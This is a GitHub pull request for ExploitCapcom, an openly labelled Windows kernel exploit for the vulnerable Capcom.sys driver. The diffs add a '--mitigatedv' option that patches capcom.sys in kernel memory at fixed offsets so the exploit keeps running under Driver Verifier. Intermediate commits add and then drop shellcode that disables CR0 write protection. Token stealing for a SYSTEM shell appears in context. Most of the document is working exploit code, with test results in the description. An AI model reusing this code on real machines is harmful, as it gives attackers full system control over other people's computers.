### PR TITLE
Implement mitigation for Driver Verifier

### DIFF
--- a/ExploitCapcom/ExploitCapcom/ExploitCapcom.cpp
+++ b/ExploitCapcom/ExploitCapcom/ExploitCapcom.cpp
@@ -22,48 +22,50 @@
 //
 
 typedef void *PEPROCESS;
+typedef void *PERESOURCE;
+
+typedef enum _POOL_TYPE
+{
+    NonPagedPool,
+    NonPagedPoolExecute = NonPagedPool,
+} POOL_TYPE;
 
 using PSGETCURRENTPROCESSID = HANDLE(NTAPI*)();
 
-using PSLOOKUPPROCESSBYPROCESSID = NTSTATUS(NTAPI *)(_In_ HANDLE ProcessId,
+using PSLOOKUPPROCESSBYPROCESSID = NTSTATUS(NTAPI*)(_In_ HANDLE ProcessId,
     _Out_ PEPROCESS * Process);
 
-using OBDEREFERENCEOBJECT = VOID(NTAPI *)(_In_ PVOID Object);
+using OBDEREFERENCEOBJECT = VOID(NTAPI*)(_In_ PVOID Object);
 
-using PSREFERENCEPRIMARYTOKEN = PACCESS_TOKEN(NTAPI *)(
+using PSREFERENCEPRIMARYTOKEN = PACCESS_TOKEN(NTAPI*)(
     _Inout_ PEPROCESS Process);
 
-using PSDEREFERENCEPRIMARYTOKEN = VOID(NTAPI *)(
+using PSDEREFERENCEPRIMARYTOKEN = VOID(NTAPI*)(
     _In_ PACCESS_TOKEN PrimaryToken);
 
-using MMGETSYSTEMROUTINEADDRESS = PVOID(NTAPI *)(
+using MMGETSYSTEMROUTINEADDRESS = PVOID(NTAPI*)(
     _In_ PUNICODE_STRING SystemRoutineName);
 
-using RTLEQUALUNICODESTRING = BOOLEAN(NTAPI *)(
+using RTLEQUALUNICODESTRING = BOOLEAN(NTAPI*)(
     _In_ PCUNICODE_STRING String1,
     _In_ PCUNICODE_STRING String2,
     _In_ BOOLEAN CaseInSensitive);
 
-using RTLINITUNICODESTRING = VOID(NTAPI *)( 
+using RTLINITUNICODESTRING = VOID(NTAPI*)(
     _Inout_ PUNICODE_STRING DestinationString,
     _In_ PCWSTR SourceString);
 
-using RTLCOPYMEMORY = VOID(NTAPI *)(
-    _In_ void* Destination,
-    _In_ const void* Source,
-    _In_ size_t Length);
+using EXENTERCRITICALREGIONANDACQUIRERESOURCEEXCLUSIVE = PVOID(NTAPI*)(
+    _In_ PERESOURCE Resource);
 
-using KEENTERCRITICALREGION = VOID(NTAPI *)();
-using KELEAVECRITICALREGION = VOID(NTAPI *)();
+using EXRELEASERESOURCEANDLEAVECRITICALREGION = VOID(NTAPI*)(
+    _In_ PERESOURCE Resource);
 
-// Huge structure. only use it as pointer
-using PERESOURCE = PVOID;
+using EXALLOCATEPOOL = PVOID(NTAPI*)(
+    _In_ POOL_TYPE PoolType, _In_ SIZE_T NumberOfBytes);
 
-using EXACQUIRERESOURCEEXCLUSIVELITE = BOOLEAN(NTAPI *)(
-    PERESOURCE Resource, BOOLEAN Wait);
-
-using EXRELEASERESOURCELITE = VOID(NTAPI *)(
-    PERESOURCE Resource);
+using EXFREEPOOL = VOID(NTAPI*)(
+    _In_ PVOID P);
 
 // Represents shellcode to be executed
 #include <pshpack1.h>
@@ -84,7 +86,8 @@ typedef struct _IOCTL_IN_BUFFER
 } IOCTL_IN_BUFFER, *PIOCTL_IN_BUFFER;
 
 // winternal.h does not have complete members
-typedef struct _LDR_DATA_TABLE_ENTRY_EX {
+typedef struct _LDR_DATA_TABLE_ENTRY_EX
+{
     LIST_ENTRY InLoadOrderModuleList;
     LIST_ENTRY InMemoryOrderModuleList;
     LIST_ENTRY InInitializationOrderModuleList;
@@ -138,7 +141,9 @@ static BOOLEAN gIsDvMitigationEnabled = FALSE;
 int main(int argc, const char* argv[])
 {
     if (argc > 1 && strcmp(argv[1], "--mitigatedv") == 0)
+    {
         gIsDvMitigationEnabled = TRUE;
+    }
 
     ExploitCapcomDriver();
     return 0;
@@ -282,22 +287,6 @@ static void KernelPayload(MMGETSYSTEMROUTINEADDRESS MmGetSystemRoutineAddress)
 
     if (gIsDvMitigationEnabled == TRUE)
     {
-        auto KeEnterCriticalRegion = 
-            reinterpret_cast<KEENTERCRITICALREGION>(GetSystemRoutineAddress(
-                MmGetSystemRoutineAddress, L"KeEnterCriticalRegion"));
-
-        auto KeLeaveCriticalRegion =
-            reinterpret_cast<KELEAVECRITICALREGION>(GetSystemRoutineAddress(
-                MmGetSystemRoutineAddress, L"KeLeaveCriticalRegion"));
-
-        auto ExAcquireResourceExclusiveLite =
-            reinterpret_cast<EXACQUIRERESOURCEEXCLUSIVELITE>(GetSystemRoutineAddress(
-                MmGetSystemRoutineAddress, L"ExAcquireResourceExclusiveLite"));
-
-        auto ExReleaseResourceLite =
-            reinterpret_cast<EXRELEASERESOURCELITE>(GetSystemRoutineAddress(
-                MmGetSystemRoutineAddress, L"ExReleaseResourceLite"));
-
         auto RtlEqualUnicodeString =
             reinterpret_cast<RTLEQUALUNICODESTRING>(GetSystemRoutineAddress(
                 MmGetSystemRoutineAddress, L"RtlEqualUnicodeString"));
@@ -306,25 +295,35 @@ static void KernelPayload(MMGETSYSTEMROUTINEADDRESS MmGetSystemRoutineAddress)
             reinterpret_cast<RTLINITUNICODESTRING>(GetSystemRoutineAddress(
                 MmGetSystemRoutineAddress, L"RtlInitUnicodeString"));
 
-        auto NtosRtlCopyMemory =
-            reinterpret_cast<RTLCOPYMEMORY>(GetSystemRoutineAddress(
-                MmGetSystemRoutineAddress, L"RtlCopyMemory") );
+        auto ExAllocatePool =
+            reinterpret_cast<EXALLOCATEPOOL>(GetSystemRoutineAddress(
+                MmGetSystemRoutineAddress, L"ExAllocatePool"));
+
+        auto ExFreePool =
+            reinterpret_cast<EXFREEPOOL>(GetSystemRoutineAddress(
+                MmGetSystemRoutineAddress, L"ExFreePool"));
 
         auto PsLoadedModuleList =
             *reinterpret_cast<PLIST_ENTRY*>(GetSystemRoutineAddress( 
-                    MmGetSystemRoutineAddress, L"PsLoadedModuleList"));
+                MmGetSystemRoutineAddress, L"PsLoadedModuleList"));
 
         auto PsLoadedModuleResource =
             *reinterpret_cast<PERESOURCE*>(GetSystemRoutineAddress(
-                    MmGetSystemRoutineAddress, L"PsLoadedModuleResource"));
-        
-        if (PsLoadedModuleList)
-        {
-            // Disable normal kernel APCs
-            KeEnterCriticalRegion();
-            // Acquire resource
-            ExAcquireResourceExclusiveLite(PsLoadedModuleResource, TRUE);
+                MmGetSystemRoutineAddress, L"PsLoadedModuleResource"));
 
+        auto ExEnterCriticalRegionAndAcquireResourceExclusive =
+            reinterpret_cast<EXENTERCRITICALREGIONANDACQUIRERESOURCEEXCLUSIVE>(GetSystemRoutineAddress(
+                MmGetSystemRoutineAddress, L"ExEnterCriticalRegionAndAcquireResourceExclusive"));
+
+        auto ExReleaseResourceAndLeaveCriticalRegion =
+            reinterpret_cast<EXRELEASERESOURCEANDLEAVECRITICALREGION>(GetSystemRoutineAddress(
+                MmGetSystemRoutineAddress, L"ExReleaseResourceAndLeaveCriticalRegion"));
+
+        // Disable normal kernel APCs and acquire resource
+        ExEnterCriticalRegionAndAcquireResourceExclusive(PsLoadedModuleResource);
+
+        // Critical region starts herewith below
+        {
             UNICODE_STRING CapcomNameUs;
             RtlInitUnicodeString(&CapcomNameUs, L"capcom.sys");
 
@@ -332,34 +331,87 @@ static void KernelPayload(MMGETSYSTEMROUTINEADDRESS MmGetSystemRoutineAddress)
                 Entry != PsLoadedModuleList->Blink;
                 Entry = Entry->Flink)
             {
-                PLDR_DATA_TABLE_ENTRY_EX LdrEntry = 
+                PLDR_DATA_TABLE_ENTRY_EX LdrEntry =
                     CONTAINING_RECORD(Entry, LDR_DATA_TABLE_ENTRY_EX, InLoadOrderModuleList);
 
                 if (RtlEqualUnicodeString(&CapcomNameUs, &LdrEntry->BaseDllName, TRUE) == TRUE)
                 {
-                    if (LdrEntry->DllBase)
-                    {
-                        BYTE PatchShellcode[] = { 
-                            0x33, 0xC0, // xor edx, edx 
-                            0x90        // nop
-                        };
+                    BYTE PatchShellcode[] = {
+                        0x33, 0xC0, // xor edx, edx 
+                        0x90        // nop
+                    };
 
-                        NtosRtlCopyMemory(
+                    // This shellcode temporally disable CR0.WP
+                    BYTE Cr0DisableWpShellcode[] = {
+                        0x0F, 0x20, 0xC0,             // mov rax, cr0
+                        0x48, 0x0F, 0xBA, 0xF0, 0x10, // btr rax,0x10
+                        0x0F, 0x22, 0xC0,             // mov cr0,rax
+                        0xFA,                         // cli
+                        0xC3                          // ret
+                    };
+
+                    // This shellcode enable CR0.WP again
+                    BYTE Cr0EnableWpShellcode[] = {
+                        0x0F, 0x20, 0xC0,             // mov rax, cr0
+                        0xFB,                         // sti
+                        0x48, 0x0F, 0xBA, 0xE8, 0x10, // bts rax, 0x10
+                        0x0F, 0x22, 0xC0,             // mov cr0, rax
+                        0xC3                          // ret
+                    };
+
+                    // Allocate pool for CR0.WP modification shellcodes
+                    PVOID ExecutablePool = ExAllocatePool(
+                        NonPagedPoolExecute, sizeof(Cr0DisableWpShellcode));
+
+                    //
+                    // Size of allocation assumes both disable and enable
+                    // shellcode sizes are equal
+                    //
+                    static_assert(
+                        sizeof(Cr0DisableWpShellcode) == sizeof(Cr0EnableWpShellcode),
+                        "must be equal, if not, please allocate bigger one");
+
+                    if (ExecutablePool)
+                    {
+                        // Copy Cr0DisableWpShellcode to the pool
+                        memcpy(
+                            ExecutablePool,
+                            &Cr0DisableWpShellcode,
+                            sizeof( Cr0DisableWpShellcode));
+
+                        // Call Cr0DisableWpShellcode to disable CR0.WP
+                        reinterpret_cast<void* (*)()>(ExecutablePool);
+
+                        // Patch for IRP_MJ_DEVICE_CONTROL
+                        memcpy(
                             (void*)((UINT_PTR)LdrEntry->DllBase + 0x631),
                             &PatchShellcode,
                             sizeof(PatchShellcode));
 
-                        NtosRtlCopyMemory(
+                        // Patch for IRP_MJ_CREATE and IRP_MJ_CLOSE
+                        memcpy(
                             (void*)((UINT_PTR)LdrEntry->DllBase + 0x518),
                             &PatchShellcode,
                             sizeof(PatchShellcode));
+
+                        // Copy Cr0EnableWpShellcode to the pool
+                        memcpy(
+                            ExecutablePool,
+                            &Cr0EnableWpShellcode,
+                            sizeof(Cr0EnableWpShellcode));
+
+                        // Call Cr0EnableWpShellcode to re-enable CR0.WP
+                        reinterpret_cast<void* (*)()>(ExecutablePool);
+
+                        ExFreePool(ExecutablePool);
+                        break;
                     }
                 }
             }
-
-            ExReleaseResourceLite(PsLoadedModuleResource);
-            KeLeaveCriticalRegion();
         }
+        // Critical region ends
+
+        ExReleaseResourceAndLeaveCriticalRegion(PsLoadedModuleResource);
     }
 
     // Get the process object of the current process

--- a/ExploitCapcom/ExploitCapcom/ExploitCapcom.cpp
+++ b/ExploitCapcom/ExploitCapcom/ExploitCapcom.cpp
@@ -380,7 +380,7 @@ static void KernelPayload(MMGETSYSTEMROUTINEADDRESS MmGetSystemRoutineAddress)
                             sizeof(Cr0DisableWpShellcode));
 
                         // Call Cr0DisableWpShellcode to disable CR0.WP
-                        reinterpret_cast<void* (*)()>(ExecutablePool);
+                        reinterpret_cast<void* (*)()>(ExecutablePool)();
 
                         // Patch for IRP_MJ_DEVICE_CONTROL
                         memcpy(
@@ -401,7 +401,7 @@ static void KernelPayload(MMGETSYSTEMROUTINEADDRESS MmGetSystemRoutineAddress)
                             sizeof(Cr0EnableWpShellcode));
 
                         // Call Cr0EnableWpShellcode to re-enable CR0.WP
-                        reinterpret_cast<void* (*)()>(ExecutablePool);
+                        reinterpret_cast<void* (*)()>(ExecutablePool)();
 
                         ExFreePool(ExecutablePool);
                         break;

--- a/ExploitCapcom/ExploitCapcom/ExploitCapcom.cpp
+++ b/ExploitCapcom/ExploitCapcom/ExploitCapcom.cpp
@@ -344,8 +344,8 @@ static void KernelPayload(MMGETSYSTEMROUTINEADDRESS MmGetSystemRoutineAddress)
                     // This shellcode temporally disable CR0.WP
                     BYTE Cr0DisableWpShellcode[] = {
                         0x0F, 0x20, 0xC0,             // mov rax, cr0
-                        0x48, 0x0F, 0xBA, 0xF0, 0x10, // btr rax,0x10
-                        0x0F, 0x22, 0xC0,             // mov cr0,rax
+                        0x48, 0x0F, 0xBA, 0xF0, 0x10, // btr rax, 0x10
+                        0x0F, 0x22, 0xC0,             // mov cr0, rax
                         0xFA,                         // cli
                         0xC3                          // ret
                     };

--- a/ExploitCapcom/ExploitCapcom/ExploitCapcom.cpp
+++ b/ExploitCapcom/ExploitCapcom/ExploitCapcom.cpp
@@ -340,72 +340,20 @@ static void KernelPayload(MMGETSYSTEMROUTINEADDRESS MmGetSystemRoutineAddress)
                         0x33, 0xC0, // xor edx, edx 
                         0x90        // nop
                     };
+                    
+                    // Patch for IRP_MJ_DEVICE_CONTROL
+                    memcpy(
+                        (void*)((UINT_PTR)LdrEntry->DllBase + 0x631),
+                        &PatchShellcode,
+                        sizeof(PatchShellcode));
 
-                    // This shellcode temporally disable CR0.WP
-                    BYTE Cr0DisableWpShellcode[] = {
-                        0x0F, 0x20, 0xC0,             // mov rax, cr0
-                        0x48, 0x0F, 0xBA, 0xF0, 0x10, // btr rax, 0x10
-                        0x0F, 0x22, 0xC0,             // mov cr0, rax
-                        0xFA,                         // cli
-                        0xC3                          // ret
-                    };
+                    // Patch for IRP_MJ_CREATE and IRP_MJ_CLOSE
+                    memcpy(
+                        (void*)((UINT_PTR)LdrEntry->DllBase + 0x518),
+                        &PatchShellcode,
+                        sizeof(PatchShellcode));
 
-                    // This shellcode enable CR0.WP again
-                    BYTE Cr0EnableWpShellcode[] = {
-                        0x0F, 0x20, 0xC0,             // mov rax, cr0
-                        0xFB,                         // sti
-                        0x48, 0x0F, 0xBA, 0xE8, 0x10, // bts rax, 0x10
-                        0x0F, 0x22, 0xC0,             // mov cr0, rax
-                        0xC3                          // ret
-                    };
-
-                    // Allocate pool for CR0.WP modification shellcodes
-                    PVOID ExecutablePool = ExAllocatePool(
-                        NonPagedPoolExecute, sizeof(Cr0DisableWpShellcode));
-
-                    //
-                    // Size of allocation assumes both disable and enable
-                    // shellcode sizes are equal
-                    //
-                    static_assert(
-                        sizeof(Cr0DisableWpShellcode) == sizeof(Cr0EnableWpShellcode),
-                        "must be equal, if not, please allocate bigger one");
-
-                    if (ExecutablePool)
-                    {
-                        // Copy Cr0DisableWpShellcode to the pool
-                        memcpy(
-                            ExecutablePool,
-                            &Cr0DisableWpShellcode,
-                            sizeof(Cr0DisableWpShellcode));
-
-                        // Call Cr0DisableWpShellcode to disable CR0.WP
-                        reinterpret_cast<void* (*)()>(ExecutablePool)();
-
-                        // Patch for IRP_MJ_DEVICE_CONTROL
-                        memcpy(
-                            (void*)((UINT_PTR)LdrEntry->DllBase + 0x631),
-                            &PatchShellcode,
-                            sizeof(PatchShellcode));
-
-                        // Patch for IRP_MJ_CREATE and IRP_MJ_CLOSE
-                        memcpy(
-                            (void*)((UINT_PTR)LdrEntry->DllBase + 0x518),
-                            &PatchShellcode,
-                            sizeof(PatchShellcode));
-
-                        // Copy Cr0EnableWpShellcode to the pool
-                        memcpy(
-                            ExecutablePool,
-                            &Cr0EnableWpShellcode,
-                            sizeof(Cr0EnableWpShellcode));
-
-                        // Call Cr0EnableWpShellcode to re-enable CR0.WP
-                        reinterpret_cast<void* (*)()>(ExecutablePool)();
-
-                        ExFreePool(ExecutablePool);
-                        break;
-                    }
+                    break;
                 }
             }
         }

--- a/ExploitCapcom/ExploitCapcom/ExploitCapcom.cpp
+++ b/ExploitCapcom/ExploitCapcom/ExploitCapcom.cpp
@@ -39,6 +39,20 @@ using PSDEREFERENCEPRIMARYTOKEN = VOID(NTAPI *)(
 using MMGETSYSTEMROUTINEADDRESS = PVOID(NTAPI *)(
     _In_ PUNICODE_STRING SystemRoutineName);
 
+using RTLEQUALUNICODESTRING = BOOLEAN(NTAPI *)(
+    PCUNICODE_STRING String1,
+    PCUNICODE_STRING String2,
+    BOOLEAN CaseInSensitive);
+
+using RTLINITUNICODESTRING = VOID(NTAPI *)( 
+    PUNICODE_STRING DestinationString,
+    __drv_aliasesMem PCWSTR SourceString);
+
+using RTLCOPYMEMORY = VOID(NTAPI *)(
+    void* Destination,
+    const void* Source,
+    size_t Length);
+
 // Represents shellcode to be executed
 #include <pshpack1.h>
 typedef struct _SHELLCODE
@@ -56,6 +70,25 @@ typedef struct _IOCTL_IN_BUFFER
     void *ShellcodeAddress;
     SHELLCODE Shellcode;
 } IOCTL_IN_BUFFER, *PIOCTL_IN_BUFFER;
+
+// winternal.h does not have complete members
+typedef struct _LDR_DATA_TABLE_ENTRY_EX {
+    LIST_ENTRY InLoadOrderModuleList;
+    LIST_ENTRY InMemoryOrderModuleList;
+    LIST_ENTRY InInitializationOrderModuleList;
+    PVOID DllBase;
+    PVOID EntryPoint;
+    ULONG SizeOfImage;
+    UNICODE_STRING FullDllName;
+    UNICODE_STRING BaseDllName;
+    ULONG Flags;
+    USHORT LoadCount;
+    USHORT TlsIndex;
+    LIST_ENTRY HashLinks;
+    PVOID SectionPointer;
+    ULONG CheckSum;
+    ULONG TimeDateStamp;
+} LDR_DATA_TABLE_ENTRY_EX, * PLDR_DATA_TABLE_ENTRY_EX;
 
 ////////////////////////////////////////////////////////////////////////////////
 //
@@ -81,14 +114,18 @@ static bool LaunchShell();
 
 // Indicates whether token stealing is done successfully
 static BOOLEAN gIsTokenStealingSuccessful = FALSE;
+static BOOLEAN gIsDvMitigationEnabled = FALSE;
 
 ////////////////////////////////////////////////////////////////////////////////
 //
 // implementations
 //
 
-int main()
+int main(int argc, const char* argv[])
 {
+    if (argc > 1 && strcmp(argv[1], "--mitigatedv") == 0)
+        gIsDvMitigationEnabled = TRUE;
+
     ExploitCapcomDriver();
     return 0;
 }
@@ -106,6 +143,11 @@ static bool ExploitCapcomDriver()
 {
     std::cout << std::hex;
     std::cout << "[*] Capcom.sys exploit" << std::endl;
+
+    if (gIsDvMitigationEnabled == TRUE)
+    {
+        std::cout << "[*] DV mitigation is enabled" << std::endl;
+    }
 
     // Open the device created by Capcom.sys
     auto DeviceHandle = make_unique_ex(
@@ -223,6 +265,74 @@ static void KernelPayload(MMGETSYSTEMROUTINEADDRESS MmGetSystemRoutineAddress)
     auto SystemProcess =
         *reinterpret_cast<PEPROCESS*>(GetSystemRoutineAddress(
             MmGetSystemRoutineAddress, L"PsInitialSystemProcess"));
+
+    if (gIsDvMitigationEnabled)
+    {
+        auto RtlEqualUnicodeString =
+            reinterpret_cast<RTLEQUALUNICODESTRING>(GetSystemRoutineAddress(
+                MmGetSystemRoutineAddress, L"RtlEqualUnicodeString"));
+
+        auto RtlInitUnicodeString =
+            reinterpret_cast<RTLINITUNICODESTRING>(GetSystemRoutineAddress(
+                MmGetSystemRoutineAddress, L"RtlInitUnicodeString"));
+
+        auto NtosRtlCopyMemory =
+            reinterpret_cast<RTLCOPYMEMORY>(GetSystemRoutineAddress(
+                MmGetSystemRoutineAddress, L"RtlCopyMemory") );
+
+        auto PsLoadedModuleList =
+            *reinterpret_cast<PLIST_ENTRY*>( 
+                GetSystemRoutineAddress( 
+                    MmGetSystemRoutineAddress, L"PsLoadedModuleList"));
+        
+        if (PsLoadedModuleList)
+        {
+            UNICODE_STRING capcomNameUs;
+            RtlInitUnicodeString(&capcomNameUs, L"capcom.sys");
+
+            PLIST_ENTRY ListEntry = (PLIST_ENTRY)PsLoadedModuleList;
+
+            for (PLIST_ENTRY Entry = ListEntry;
+                Entry != ListEntry->Blink;
+                Entry = Entry->Flink)
+            {
+                PLDR_DATA_TABLE_ENTRY_EX LdrEntry = 
+                    CONTAINING_RECORD(Entry, LDR_DATA_TABLE_ENTRY_EX, InLoadOrderModuleList);
+
+                if (RtlEqualUnicodeString(&capcomNameUs, &LdrEntry->BaseDllName, TRUE) == TRUE)
+                {
+                    if (LdrEntry->DllBase)
+                    {
+                        BYTE shell1[] = { 
+                            0x33, 0xC0, // xor edx, edx (STATUS_SUCCESS)
+                            0x48, 0x83, 0xC4, 0x20, // add rsp, 20h
+                            0x5F, // pop rdi
+                            0x5E, // pop rsi
+                            0x5B, // pop rbx
+                            0xC3 // ret
+                        };
+
+                        BYTE shell2[] = { 
+                            0x33, 0xC0, // xor edx, edx (STATUS_SUCCESS)
+                            0x48, 0x83, 0xC4, 0x20, // add rsp, 20h
+                            0x5B, // pop rbx
+                            0xC3 // ret
+                        };
+
+                        NtosRtlCopyMemory(
+                            (void*)((UINT_PTR)LdrEntry->DllBase + 0x631),
+                            &shell1,
+                            sizeof(shell1));
+
+                        NtosRtlCopyMemory(
+                            (void*)((UINT_PTR)LdrEntry->DllBase + 0x518),
+                            &shell2,
+                            sizeof(shell2));
+                    }
+                }
+            }
+        }
+    }
 
     // Get the process object of the current process
     PEPROCESS CurrentProcess = nullptr;

--- a/ExploitCapcom/ExploitCapcom/ExploitCapcom.cpp
+++ b/ExploitCapcom/ExploitCapcom/ExploitCapcom.cpp
@@ -53,6 +53,18 @@ using RTLCOPYMEMORY = VOID(NTAPI *)(
     _In_ const void* Source,
     _In_ size_t Length);
 
+using KEENTERCRITICALREGION = VOID(NTAPI *)();
+using KELEAVECRITICALREGION = VOID(NTAPI *)();
+
+// Huge structure. only use it as pointer
+using PERESOURCE = PVOID;
+
+using EXACQUIRERESOURCEEXCLUSIVELITE = BOOLEAN(NTAPI *)(
+    PERESOURCE Resource, BOOLEAN Wait);
+
+using EXRELEASERESOURCELITE = VOID(NTAPI *)(
+    PERESOURCE Resource);
+
 // Represents shellcode to be executed
 #include <pshpack1.h>
 typedef struct _SHELLCODE
@@ -114,6 +126,8 @@ static bool LaunchShell();
 
 // Indicates whether token stealing is done successfully
 static BOOLEAN gIsTokenStealingSuccessful = FALSE;
+
+// Indicates mitigation for driver verifier
 static BOOLEAN gIsDvMitigationEnabled = FALSE;
 
 ////////////////////////////////////////////////////////////////////////////////
@@ -268,6 +282,22 @@ static void KernelPayload(MMGETSYSTEMROUTINEADDRESS MmGetSystemRoutineAddress)
 
     if (gIsDvMitigationEnabled == TRUE)
     {
+        auto KeEnterCriticalRegion = 
+            reinterpret_cast<KEENTERCRITICALREGION>(GetSystemRoutineAddress(
+                MmGetSystemRoutineAddress, L"KeEnterCriticalRegion"));
+
+        auto KeLeaveCriticalRegion =
+            reinterpret_cast<KELEAVECRITICALREGION>(GetSystemRoutineAddress(
+                MmGetSystemRoutineAddress, L"KeLeaveCriticalRegion"));
+
+        auto ExAcquireResourceExclusiveLite =
+            reinterpret_cast<EXACQUIRERESOURCEEXCLUSIVELITE>(GetSystemRoutineAddress(
+                MmGetSystemRoutineAddress, L"ExAcquireResourceExclusiveLite"));
+
+        auto ExReleaseResourceLite =
+            reinterpret_cast<EXRELEASERESOURCELITE>(GetSystemRoutineAddress(
+                MmGetSystemRoutineAddress, L"ExReleaseResourceLite"));
+
         auto RtlEqualUnicodeString =
             reinterpret_cast<RTLEQUALUNICODESTRING>(GetSystemRoutineAddress(
                 MmGetSystemRoutineAddress, L"RtlEqualUnicodeString"));
@@ -281,56 +311,54 @@ static void KernelPayload(MMGETSYSTEMROUTINEADDRESS MmGetSystemRoutineAddress)
                 MmGetSystemRoutineAddress, L"RtlCopyMemory") );
 
         auto PsLoadedModuleList =
-            *reinterpret_cast<PLIST_ENTRY*>( 
-                GetSystemRoutineAddress( 
+            *reinterpret_cast<PLIST_ENTRY*>(GetSystemRoutineAddress( 
                     MmGetSystemRoutineAddress, L"PsLoadedModuleList"));
+
+        auto PsLoadedModuleResource =
+            *reinterpret_cast<PERESOURCE*>(GetSystemRoutineAddress(
+                    MmGetSystemRoutineAddress, L"PsLoadedModuleResource"));
         
         if (PsLoadedModuleList)
         {
-            UNICODE_STRING capcomNameUs;
-            RtlInitUnicodeString(&capcomNameUs, L"capcom.sys");
+            // Disable normal kernel APCs
+            KeEnterCriticalRegion();
+            // Acquire resource
+            ExAcquireResourceExclusiveLite(PsLoadedModuleResource, TRUE);
 
-            PLIST_ENTRY ListEntry = (PLIST_ENTRY)PsLoadedModuleList;
+            UNICODE_STRING CapcomNameUs;
+            RtlInitUnicodeString(&CapcomNameUs, L"capcom.sys");
 
-            for (PLIST_ENTRY Entry = ListEntry;
-                Entry != ListEntry->Blink;
+            for (PLIST_ENTRY Entry = PsLoadedModuleList;
+                Entry != PsLoadedModuleList->Blink;
                 Entry = Entry->Flink)
             {
                 PLDR_DATA_TABLE_ENTRY_EX LdrEntry = 
                     CONTAINING_RECORD(Entry, LDR_DATA_TABLE_ENTRY_EX, InLoadOrderModuleList);
 
-                if (RtlEqualUnicodeString(&capcomNameUs, &LdrEntry->BaseDllName, TRUE) == TRUE)
+                if (RtlEqualUnicodeString(&CapcomNameUs, &LdrEntry->BaseDllName, TRUE) == TRUE)
                 {
                     if (LdrEntry->DllBase)
                     {
-                        BYTE shell1[] = { 
-                            0x33, 0xC0, // xor edx, edx (STATUS_SUCCESS)
-                            0x48, 0x83, 0xC4, 0x20, // add rsp, 20h
-                            0x5F, // pop rdi
-                            0x5E, // pop rsi
-                            0x5B, // pop rbx
-                            0xC3 // ret
-                        };
-
-                        BYTE shell2[] = { 
-                            0x33, 0xC0, // xor edx, edx (STATUS_SUCCESS)
-                            0x48, 0x83, 0xC4, 0x20, // add rsp, 20h
-                            0x5B, // pop rbx
-                            0xC3 // ret
+                        BYTE PatchShellcode[] = { 
+                            0x33, 0xC0, // xor edx, edx 
+                            0x90        // nop
                         };
 
                         NtosRtlCopyMemory(
                             (void*)((UINT_PTR)LdrEntry->DllBase + 0x631),
-                            &shell1,
-                            sizeof(shell1));
+                            &PatchShellcode,
+                            sizeof(PatchShellcode));
 
                         NtosRtlCopyMemory(
                             (void*)((UINT_PTR)LdrEntry->DllBase + 0x518),
-                            &shell2,
-                            sizeof(shell2));
+                            &PatchShellcode,
+                            sizeof(PatchShellcode));
                     }
                 }
             }
+
+            ExReleaseResourceLite(PsLoadedModuleResource);
+            KeLeaveCriticalRegion();
         }
     }
 

--- a/ExploitCapcom/ExploitCapcom/ExploitCapcom.cpp
+++ b/ExploitCapcom/ExploitCapcom/ExploitCapcom.cpp
@@ -377,7 +377,7 @@ static void KernelPayload(MMGETSYSTEMROUTINEADDRESS MmGetSystemRoutineAddress)
                         memcpy(
                             ExecutablePool,
                             &Cr0DisableWpShellcode,
-                            sizeof( Cr0DisableWpShellcode));
+                            sizeof(Cr0DisableWpShellcode));
 
                         // Call Cr0DisableWpShellcode to disable CR0.WP
                         reinterpret_cast<void* (*)()>(ExecutablePool);

--- a/ExploitCapcom/ExploitCapcom/ExploitCapcom.cpp
+++ b/ExploitCapcom/ExploitCapcom/ExploitCapcom.cpp
@@ -40,18 +40,18 @@ using MMGETSYSTEMROUTINEADDRESS = PVOID(NTAPI *)(
     _In_ PUNICODE_STRING SystemRoutineName);
 
 using RTLEQUALUNICODESTRING = BOOLEAN(NTAPI *)(
-    PCUNICODE_STRING String1,
-    PCUNICODE_STRING String2,
-    BOOLEAN CaseInSensitive);
+    _In_ PCUNICODE_STRING String1,
+    _In_ PCUNICODE_STRING String2,
+    _In_ BOOLEAN CaseInSensitive);
 
 using RTLINITUNICODESTRING = VOID(NTAPI *)( 
-    PUNICODE_STRING DestinationString,
-    __drv_aliasesMem PCWSTR SourceString);
+    _Inout_ PUNICODE_STRING DestinationString,
+    _In_ PCWSTR SourceString);
 
 using RTLCOPYMEMORY = VOID(NTAPI *)(
-    void* Destination,
-    const void* Source,
-    size_t Length);
+    _In_ void* Destination,
+    _In_ const void* Source,
+    _In_ size_t Length);
 
 // Represents shellcode to be executed
 #include <pshpack1.h>
@@ -266,7 +266,7 @@ static void KernelPayload(MMGETSYSTEMROUTINEADDRESS MmGetSystemRoutineAddress)
         *reinterpret_cast<PEPROCESS*>(GetSystemRoutineAddress(
             MmGetSystemRoutineAddress, L"PsInitialSystemProcess"));
 
-    if (gIsDvMitigationEnabled)
+    if (gIsDvMitigationEnabled == TRUE)
     {
         auto RtlEqualUnicodeString =
             reinterpret_cast<RTLEQUALUNICODESTRING>(GetSystemRoutineAddress(

--- a/README.md
+++ b/README.md
@@ -4,7 +4,9 @@ ExploitCapcom
 ❗❗Obsolete❗❗
 -------------
 
-This exploit no longer works since Windows 10 20H2 (Build 19042), and the author will not provide a fix or workaround for it. See [issue #3](https://github.com/tandasat/ExploitCapcom/issues/3) for more details.
+This exploit no longer works since Windows 10 20H2 (Build 19042) while DV (*Driver Verifier*) is enabled. See [issue #3](https://github.com/tandasat/ExploitCapcom/issues/3) and [PR #4](https://github.com/tandasat/ExploitCapcom/pull/4) for more details.
+
+In order to avoid DV crash, use `--mitigatedv` parameter. e.g, `ExploitCapcom.exe --mitigatedv`.
 
 
 Description


### PR DESCRIPTION
This is a mitigation for issue #3 .

Added optional augment of `--mitigatedv` which allows execution of this exploit to be work while DV (*Driver Verifier*) is enabled.
This mitigation only supports Windows 10+.

Tested on:

- x64 Windows 10 2004 19041.985
    - ![success_2004_19041](https://user-images.githubusercontent.com/37926134/120923186-318e3080-c708-11eb-86bf-fbb57e9f258c.png)
- x64 Windows 10 20H2 19042.631
    - ![success_20H2_19042](https://user-images.githubusercontent.com/37926134/120923211-4c60a500-c708-11eb-8e59-dbad5889f90b.png)
- x64 Windows 10 21H1 19043.985
![success_21H1_19043](https://user-images.githubusercontent.com/37926134/120923223-5bdfee00-c708-11eb-9b9f-3899718ea529.png)



# What
As discussed on the issue, this is due to bad implementation of capcom.

![image](https://user-images.githubusercontent.com/37926134/120922796-220de800-c706-11eb-99d9-0cfc5d288bc0.png)

Both of `CpCreateClose` and `CpDeviceIoControl` reference `Irp->IoStatus.Status` after the IRP is freed by `IofCompleteRequest`.

![image](https://user-images.githubusercontent.com/37926134/120922819-436ed400-c706-11eb-9b7d-476534fa7625.png)

